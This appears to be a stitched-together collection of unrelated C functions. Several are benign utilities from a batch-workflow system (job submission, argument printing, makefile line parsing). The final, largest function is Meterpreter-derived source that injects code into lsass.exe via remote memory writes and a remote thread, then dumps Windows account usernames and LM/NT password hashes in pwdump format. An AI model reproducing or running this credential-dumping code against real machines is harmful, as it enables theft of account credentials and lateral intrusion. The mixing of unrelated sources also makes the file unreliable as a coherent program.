int wavefront_task_submit_recursive( struct wavefront_task *n ) { int i,j; char command[PATH_MAX]; char filename[PATH_MAX]; char extra_output_files[PATH_MAX]; char *extra_input_files=NULL; string_nformat(command, PATH_MAX, "./wavefront -M -X %d -Y %d ./%s %d %d >output.%d.%d 2>&1", n->x,n->y,function,n->width,n->height,n->x,n->y); string_nformat(extra_output_files, PATH_MAX, "output.%d.%d",n->x,n->y); extra_input_files = string_format("wavefront,%s",function); for(i=-1;i<n->width;i++) { string_nformat(filename, PATH_MAX, "R.%d.%d", n->x+i,n->y-1); extra_input_files=string_combine(extra_input_files, ","); extra_input_files=string_combine(extra_input_files, filename); } for(j=0;j<n->height;j++) { string_nformat(filename, PATH_MAX, "R.%d.%d",n->x-1,n->y+j); extra_input_files=string_combine(extra_input_files, ","); extra_input_files=string_combine(extra_input_files, filename); } batch_job_id_t job_id = batch_job_submit_simple(batch_q,command,extra_input_files,extra_output_files); free(extra_input_files); return job_id; }
static char * variable_print_argv( int withquotes ) { char *result=0; int i; result = xxstrdup(""); for(i=1;i<head->argc;i++) { result = string_combine(result,xxstrdup(head->argv[i])); if(i!=(head->argc-1)) { if(withquotes) { result = string_combine(result,xxstrdup("\" \"")); } else { result = string_combine(result,xxstrdup(" ")); } } } return result; }
// the caller should free the result. char *create_umbrella_opt(bool remote_rename_support, char *files, bool is_output, const char *umbrella_logfile) { char *s = files; size_t size; char *result = NULL; // the result will be freed by the caller, therefore returning a copy of s is needed. // Returning the original copy and free the original copy may cuase memory corruption. if(!strcmp(s, "")) return xxstrdup(s); // construct the --output or --inputs option of umbrella based on files while((size = strcspn(s, ",\0")) > 0) { char *t; s[size] = '\0'; if(!remote_rename_support) { t = s; } else { t = strchr(s, '='); t++; } // avoid adding umbrella_logfile into umbrella_output_opt if(strcmp(t, umbrella_logfile)) { result = string_combine(result, t); result = string_combine(result, "="); result = string_combine(result, t); if(is_output) result = string_combine(result, ":f,"); else result = string_combine(result, ","); } s[size] = ','; s += size+1; } return result; }
char *string_combine_multi(char *r, ...) { char *n; va_list args; va_start(args, r); while((n = va_arg(args, char *))) { r = string_combine(r, n); } return r; va_end(args); }
/** Read multiple lines connected by shell continuation symbol * (backslash). Return as a single line. Caller will own the * memory. * The continuation is detected when backslash is the last symbol * before the newline character, and the symbol last before last is * not the backslash (double backslash is an escape sequence for * backslash itself). */ char* get_continued_line(struct lexer_book *bk) { char *cont_line = NULL; char *raw_line = NULL; int cont = 1; while(cont && ((raw_line=get_line(bk->stream)) != NULL)) { bk->column_number = 1; bk->line_number++; if(bk->line_number % 1000 == 0) { debug(D_DEBUG, "read line %ld\n", bk->line_number); } /* Strip whitespace */ string_chomp(raw_line); while(isspace(*raw_line)) { raw_line++; bk->column_number++; } size_t len = strlen(raw_line); if(len>0 && raw_line[len-1] == '\\' && (len==1 || raw_line[len-2] != '\\')) { raw_line[len-1] = '\0'; cont++; } else { cont = 0; } if(cont_line) { cont_line = string_combine(cont_line,raw_line); } else { cont_line = xxstrdup(raw_line); } } if(cont > 1) { dag_parse_error(bk, "No line found after line continuation backslash"); free(cont_line); cont_line = NULL; fatal("Unable to parse the makeflow file"); } return cont_line; }
/*! * @brief Function driving the SAM dumping. * @param dwMillisecondsToWait How long to wait for the results before giving up. * @param hashresults Pointer that will receive the hash dump results. * @returns Indication of success or failure. */ DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults) { HANDLE hThreadHandle = NULL, hLsassHandle = NULL, hReadLock = NULL, hFreeLock = NULL; LPVOID pvParameterMemory = NULL, pvFunctionMemory = NULL; DWORD_PTR dwFunctionSize; SIZE_T sBytesWritten = 0, sBytesRead = 0; DWORD dwNumberOfUsers = 0, dwCurrentUserIndex = 0, HashIndex = 0; FUNCTIONARGS InitFunctionArguments, FinalFunctionArguments; USERNAMEHASH *UsernameHashResults = NULL; PVOID UsernameAddress = NULL; DWORD dwError = 0; char *hashstring = NULL; /* METERPRETER CODE */ char buffer[100]; /* END METERPRETER CODE */ do { /* ORANGE control input - move this to the client perl side */ if (dwMillisecondsToWait < 60000) { dwMillisecondsToWait = 60000; } if (dwMillisecondsToWait > 300000) { dwMillisecondsToWait = 300000; } /* create the event kernel sync objects */ hReadLock = CreateEvent(NULL, FALSE, FALSE, READ_SYNC_EVENT_NAME); hFreeLock = CreateEvent(NULL, FALSE, FALSE, FREE_SYNC_EVENT_NAME); if (!hReadLock || !hFreeLock) { dwError = GetLastError(); break; } /* calculate the function size */ if ((DWORD_PTR)dump_sam >= (DWORD_PTR)sizer) { dprintf("Error calculating the function size."); dwError = ERROR_INVALID_PARAMETER; break; } dwFunctionSize = (DWORD_PTR)sizer - (DWORD_PTR)dump_sam; if ((dwError = set_access_priv()) != ERROR_SUCCESS) { dprintf("Error setting SE_DEBUG_NAME privilege: %u (%x)"); break; } hLsassHandle = get_lsass_handle(); if (hLsassHandle == 0) { dwError = ERROR_INVALID_PARAMETER; dprintf("Error getting lsass.exe handle."); break; } /* set the arguments in the context structure */ if ((dwError = setup_dump_sam_arguments(&InitFunctionArguments, dwMillisecondsToWait)) != ERROR_SUCCESS) { dprintf("[PASSWD] Unable to set arguments %u (%x)", dwError, dwError); break; } /* allocate memory for the context structure */ pvParameterMemory = VirtualAllocEx(hLsassHandle, NULL, sizeof(FUNCTIONARGS), MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (pvParameterMemory == NULL) { dwError = GetLastError(); dprintf("[PASSWD] Failed to allocat memory %u (%x)", dwError, dwError); break; } /* write context structure into remote process */ if (WriteProcessMemory(hLsassHandle, pvParameterMemory, &InitFunctionArguments, sizeof(InitFunctionArguments), &sBytesWritten) == 0) { dwError = GetLastError(); dprintf("[PASSWD] Failed to write process memory for function args %u (%x)", dwError, dwError); break; } if (sBytesWritten != sizeof(InitFunctionArguments)) { dwError = 1; break; } sBytesWritten = 0; /* allocate memory for the function */ pvFunctionMemory = VirtualAllocEx(hLsassHandle, NULL, dwFunctionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (pvFunctionMemory == NULL) { dwError = GetLastError(); dprintf("[PASSWD] Failed to allocate process memory %u (%x)", dwError, dwError); break; } /* write the function into the remote process */ if (WriteProcessMemory(hLsassHandle, pvFunctionMemory, dump_sam, dwFunctionSize, &sBytesWritten) == 0) { dwError = GetLastError(); dprintf("[PASSWD] Failed to write process memory for function body %u (%x)", dwError, dwError); break; } if (sBytesWritten != dwFunctionSize) { dwError = 1; break; } sBytesWritten = 0; /* start the remote thread */ if ((hThreadHandle = create_remote_thread(hLsassHandle, pvFunctionMemory, pvParameterMemory)) == NULL) { dwError = GetLastError(); dprintf("[PASSWD] Failed to create remote thread %u (%x)", dwError, dwError); break; } /* wait until the data is ready to be collected */ if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0) { dwError = GetLastError(); dprintf("[PASSWD] Timed out waiting for the data to be collected: %u (%x)", dwError, dwError); break; } /* read results of the injected function */ if (ReadProcessMemory(hLsassHandle, pvParameterMemory, &FinalFunctionArguments, sizeof(InitFunctionArguments), &sBytesRead) == 0) { dwError = GetLastError(); dprintf("[PASSWD] Failed to read process memory to get result: %u (%x)", dwError, dwError); break; } if (sBytesRead != sizeof(InitFunctionArguments)) { dwError = 1; break; } sBytesRead = 0; /* allocate space for the results */ UsernameHashResults = (USERNAMEHASH *)malloc(FinalFunctionArguments.dwDataSize); if (UsernameHashResults == NULL) { dwError = 1; break; } /* determine the number of elements and copy over the data */ dwNumberOfUsers = FinalFunctionArguments.dwDataSize / sizeof(USERNAMEHASH); /* copy the context structure */ if (ReadProcessMemory(hLsassHandle, FinalFunctionArguments.pUsernameHashData, UsernameHashResults, FinalFunctionArguments.dwDataSize, &sBytesRead) == 0) { dwError = GetLastError(); dprintf("[PASSWD] Failed to read process memory to get hashresults: %u (%x)", dwError, dwError); break; } if (sBytesRead != FinalFunctionArguments.dwDataSize) { break; } sBytesRead = 0; // save the old mem addy, malloc new space, copy over the data, free the old mem addy for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) { UsernameAddress = UsernameHashResults[dwCurrentUserIndex].Username; UsernameHashResults[dwCurrentUserIndex].Username = (char *)malloc(UsernameHashResults[dwCurrentUserIndex].Length + 1); if (UsernameHashResults[dwCurrentUserIndex].Username == NULL) { dwError = 1; break; } if (ReadProcessMemory(hLsassHandle, UsernameAddress, UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].Length, &sBytesRead) == 0) { dwError = 1; break; } if (sBytesRead != UsernameHashResults[dwCurrentUserIndex].Length) { dwError = 1; break; } UsernameHashResults[dwCurrentUserIndex].Username[UsernameHashResults[dwCurrentUserIndex].Length] = 0; } /* signal that all data has been read and wait for the remote memory to be free'd */ if (SetEvent(hFreeLock) == 0) { dwError = 1; break; } if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0) { dprintf("The timeout hit.\n"); dwError = 1; break; } /* display the results and free the malloc'd memory for the username */ for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) { /* METERPRETER CODE */ hashstring = string_combine(hashstring, UsernameHashResults[dwCurrentUserIndex].Username); hashstring = string_combine(hashstring, ":"); _snprintf_s(buffer, sizeof(buffer), 30, "%d", UsernameHashResults[dwCurrentUserIndex].RID); hashstring = string_combine(hashstring, buffer); hashstring = string_combine(hashstring, ":"); /* END METERPRETER CODE */ //printf("%s:%d:", UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].RID); for (HashIndex = 16; HashIndex < 32; HashIndex++) { /* ORANGE - insert check for ***NO PASSWORD*** if( (regData[4] == 0x35b4d3aa) && (regData[5] == 0xee0414b5) && (regData[6] == 0x35b4d3aa) && (regData[7] == 0xee0414b5) ) sprintf( LMdata, "NO PASSWORD*********************" ); */ _snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); hashstring = string_combine(hashstring, buffer); //printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); } hashstring = string_combine(hashstring, ":"); //printf(":"); for (HashIndex = 0; HashIndex < 16; HashIndex++) { /* ORANGE - insert check for ***NO PASSWORD*** if( (regData[0] == 0xe0cfd631) && (regData[1] == 0x31e96ad1) && (regData[2] == 0xd7593cb7) && (regData[3] == 0xc089c0e0) ) sprintf( NTdata, "NO PASSWORD*********************" ); */ _snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); hashstring = string_combine(hashstring, buffer); //printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); } hashstring = string_combine(hashstring, ":::\n"); //printf(":::\n"); } } while (0); /* relesase the event objects */ if (hReadLock) { CloseHandle(hReadLock); } if (hFreeLock) { CloseHandle(hFreeLock); } /* close handle to lsass */ if (hLsassHandle) { CloseHandle(hLsassHandle); } /* free the context structure and the injected function and the results */ if (pvParameterMemory) { VirtualFreeEx(hLsassHandle, pvParameterMemory, sizeof(FUNCTIONARGS), MEM_RELEASE); } if (pvFunctionMemory) { VirtualFreeEx(hLsassHandle, pvFunctionMemory, dwFunctionSize, MEM_RELEASE); } /* free the remote thread handle */ if (hThreadHandle) { CloseHandle(hThreadHandle); } /* free the results structure including individually malloced space for usernames */ if (UsernameHashResults) { for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) { if (UsernameHashResults[dwCurrentUserIndex].Username) { free(UsernameHashResults[dwCurrentUserIndex].Username); } } free(UsernameHashResults); } /* return hashresults */ *hashresults = hashstring; /* return the correct code */ return dwError; }